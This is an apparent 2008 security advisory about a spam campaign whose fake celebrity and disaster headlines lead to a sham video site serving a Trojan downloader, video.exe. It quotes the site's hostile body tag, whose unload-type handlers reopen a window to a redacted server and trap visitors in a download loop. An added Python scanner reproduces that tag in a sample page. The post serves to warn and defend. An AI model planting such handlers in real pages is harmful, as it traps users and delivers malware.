New malware outbreak tries to infect your computer with Trojan.Downloader
19 June 2008

The latest malware outbreak sends emails with subject lines such as "Paris Hilton found to be gay!", "China Earthquake claims 1 million lives", "Star Trek star dies at age 79", "Man wakes up from 40 year coma", "Batman latest movie bombs at box office" or "Italy knocked out of Euro 2008" to lure recipients into opening them. So far, over 500 emails have been intercepted within 40 minutes.

The email body is only two lines long. Its content can be anything from "Don't belittle the effects of power enlargement" to "Don't make the postman make too many attempted deliveries to get you the herbal solution that will change your life" or "Heir to Prada empire found strangled".

The malicious link has the format http://****.de/r.html and redirects you to PornTube, a rip-off of the YouTube design.

And no, we are not giving you a full screenshot of this web site.

Once you get there, a connection is made behind the scenes to a server at xx.xxx.xx.xx/index.php through event-handler scripting in the HTML body tag:

<body onbeforeunload="window.open('http://xx.xxx.xx.xx/index.php');" onunload="window.open('http://xx.xxx.xx.xx/index.php');" onclose="window.open('http://xx.xxx.xx.xx/index.php');" id="mainbody">

Over this connection the page tries to download the file video.exe directly to your computer. Pop-up windows appear stating that you need to download an ActiveX object to play the videos, and it doesn't matter whether you click Cancel or No: you are stuck in a loop until you download video.exe. Closing your windows or the browser is the only way out, and even then the unload handlers open a new browser window pointing at this server again.
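Added example, not code from the original article: a small Python scanner that flags HTML pages whose body tag attaches window.open to unload-type events, which is the pop-up loop trick quoted above. The sample page is constructed and reuses the article's redacted xx.xxx.xx.xx address.

```python
"""Flag HTML whose <body> re-opens a window from unload-type event handlers."""
from html.parser import HTMLParser

# Handlers that fire when the user tries to leave or close the page.
LEAVE_EVENTS = {"onbeforeunload", "onunload", "onclose"}


def _extract_url(handler):
    """Return the first quoted argument of window.open(...), or None."""
    start = handler.find("window.open(")
    if start == -1:
        return None
    rest = handler[start + len("window.open("):]
    for quote in ("'", '"'):
        if rest.startswith(quote):
            end = rest.find(quote, 1)
            return rest[1:end] if end != -1 else None
    return None


class BodyHandlerScanner(HTMLParser):
    """Collect unload-type handlers on <body>/<frameset> that call window.open."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (event name, handler source, opened URL)

    def handle_starttag(self, tag, attrs):
        if tag not in ("body", "frameset"):
            return
        for name, value in attrs:  # html.parser lowercases attribute names
            if name in LEAVE_EVENTS and value and "window.open" in value:
                self.findings.append((name, value, _extract_url(value)))


def scan_html(html):
    """Return the list of suspicious (event, handler, url) tuples in html."""
    scanner = BodyHandlerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample mirroring the body tag quoted in the article.
SAMPLE_PAGE = (
    '<html><body onbeforeunload="window.open(\'http://xx.xxx.xx.xx/index.php\');" '
    'onunload="window.open(\'http://xx.xxx.xx.xx/index.php\');" id="mainbody">'
    "<p>video</p></body></html>"
)
BENIGN_PAGE = '<html><body onload="init()"><p>hello</p></body></html>'

if __name__ == "__main__":
    for event, _, url in scan_html(SAMPLE_PAGE):
        print(f"suspicious {event} handler opening {url}")
```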

It appears that the URLs of the form http://****.de/r.html used in this malware outbreak, which are changing quite rapidly, could in fact be hacked servers hosting legitimate web sites, where the r.html file has been placed in the web hosting root of the site. Some images are missing, which is why the design of PornTube isn't exactly like the design of YouTube.

According to WHOIS, the IP address where the malware is hosted is registered in Amsterdam, The Netherlands. The video.exe is a variant of Trojan.Downloader.Win32Agent.tyw. This trojan downloads and installs other malware on an infected computer.
